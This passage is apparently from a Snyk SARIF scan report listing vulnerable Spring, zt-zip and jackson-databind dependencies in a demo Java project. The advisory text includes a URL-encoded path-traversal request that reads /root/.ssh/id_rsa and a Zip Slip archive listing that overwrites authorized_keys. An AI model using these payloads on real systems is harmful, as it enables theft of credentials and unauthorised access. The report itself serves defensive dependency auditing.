http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. 
\n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n# Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-22", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-expression" 
+ }, + "fullDescription": { + "text": "(CVE-2022-22950) org.springframework:spring-expression@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-expression\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE › org.springframework:spring-expression@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "shortDescription": { + "text": "Medium severity - Allocation of Resources Without Limits or Throttling vulnerability in org.springframework:spring-expression" + }, + "fullDescription": { + "text": "(CVE-2023-20861) org.springframework:spring-expression@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-expression\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE › org.springframework:spring-expression@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n# Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub 
Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-770", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "shortDescription": { + "text": "Medium severity - Allocation of Resources Without Limits or Throttling vulnerability in org.springframework:spring-expression" + }, + "fullDescription": { + "text": "(CVE-2023-20863) org.springframework:spring-expression@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-expression\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE › org.springframework:spring-expression@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n# Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-770", + "maven" + ], + "cvssv3_baseScore": 6.5, + 
"security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-beans" + }, + "fullDescription": { + "text": "(CVE-2022-22970) org.springframework:spring-beans@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-beans\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-beans@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "shortDescription": { + "text": "Low severity - Improper Handling of Case Sensitivity vulnerability in org.springframework:spring-context" + }, + "fullDescription": { + "text": "(CVE-2022-22968) org.springframework:spring-context@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-context\n* Introduced 
through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-context@3.2.6.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n# Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-178", + "maven" + ], + "cvssv3_baseScore": 3.7, + "security-severity": "3.7" + } + }, + { + "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "shortDescription": { + "text": "Medium severity - Arbitrary File Write via Archive Extraction (Zip Slip) vulnerability in org.zeroturnaround:zt-zip" + }, + "fullDescription": { + "text": "(CVE-2018-1002201) org.zeroturnaround:zt-zip@1.12" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.zeroturnaround:zt-zip\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.zeroturnaround:zt-zip@1.12\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › 
org.zeroturnaround:zt-zip@1.12\n# Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n# Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n# Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n# References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-29", + "maven" + ], + "cvssv3_baseScore": 5.5, + "security-severity": "5.5" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-C3P0-461018", + "level": "error", + "message": { + "text": "This file introduces a vulnerable c3p0:c3p0 package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "c3p0:c3p0@0.9.1.2" + } + ] + } + ] + }, + { + "ruleId": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "level": "error", + "message": { + "text": "This file introduces a vulnerable c3p0:c3p0 package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "c3p0:c3p0@0.9.1.2" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." 
